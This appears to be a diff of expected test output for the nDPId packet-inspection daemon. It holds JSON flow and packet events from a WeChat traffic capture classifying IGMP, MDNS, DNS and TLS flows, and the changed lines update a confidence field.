-00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1631,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171205448,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1631,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171205448,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1632,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171206877,"flow_last_seen":1492171206877,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171206877,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1632,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1492171206877,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492171206877,"pkt":"AQBeAAAW0CeIF3AECABGoAAoL+EAAAECUizAqAFk4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} -00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1632,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171206877,"flow_last_seen":1492171206877,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171206877,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1632,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171206877,"flow_last_seen":1492171206877,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171206877,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1633,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1492171208516,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492171208516,"pkt":"AQBeAAAW0CeIF3AECABGoAAoL+IAAAECUivAqAFk4AAAFpQEAAAiAOwDAAAAAQIAAADv\/\/\/6"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1634,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":1492171210973,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492171210973,"pkt":"AQBeAAAW0CeIF3AECABGoAAoL+UAAAECUijAqAFk4AAAFpQEAAAiAOwAAAAAAQIAAADv\/\/\/9"} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171211383,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1492171211383,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492171211383,"pkt":"AQBeAAAWACSlnnPpCABGwAAoAABAAAECQeXAqAFs4AAAFpQEAAAiAOwDAAAAAQIAAADv\/\/\/6"} -00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1635,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171211383,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1635,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171211383,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1636,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171250302,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1492171250302,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171250302,"pkt":"AQBeAAD7eJKcD6iOCABFAABESuVAAAERi7nAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} -00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1636,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171250302,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1636,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171250302,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1637,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171250302,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1492171250302,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492171250302,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} -00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1637,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171250302,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1637,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171250302,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1492171250302,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171250302,"pkt":"AQBeAAD7eJKcD6iOCABFAABESuZAAAERi7jAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1639,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1492171250302,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492171250302,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1640,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1492171251303,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171251303,"pkt":"AQBeAAD7eJKcD6iOCABFAABESy5AAAERi3DAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1641,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1492171251303,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492171251303,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1492171267294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1492171267294,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFZAAEAGSOjAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5FiAAAAQEICgA\/pcIy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171175912,"flow_last_seen":1492171267294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":440,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1644,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171175912,"flow_last_seen":1492171267294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":440,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1492171267294,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171267294,"pkt":"8IQvSpdgeJKcD6iOCABFAABEJBJAAEARkeHAqAFnwKgB\/rE2ADUAMGKHk6IBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1645,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267294,"flow_last_seen":1492171267294,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171267294,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1649,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171267430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1649,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1492171267430,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1492171267430,"pkt":"8IQvSpdgeJKcD6iOCABFAABBJlBAAEARj6bAqAFnwKgB\/uivADUALYbgc9oBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQNsYW4AAAEAAQ=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1649,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171267430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1649,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171267430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1492171268427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1492171268427,"pkt":"8IQvSpdgeJKcD6iOCABFAABBJl5AAEARj5jAqAFnwKgB\/qRaADUALSfRFz8BAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQNsYW4AAAEAAQ=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":3,"flow_last_seen":1492171268600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1492171268600,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFdAAEAGSOfAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5BhgAAAQEICgA\/qcQy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 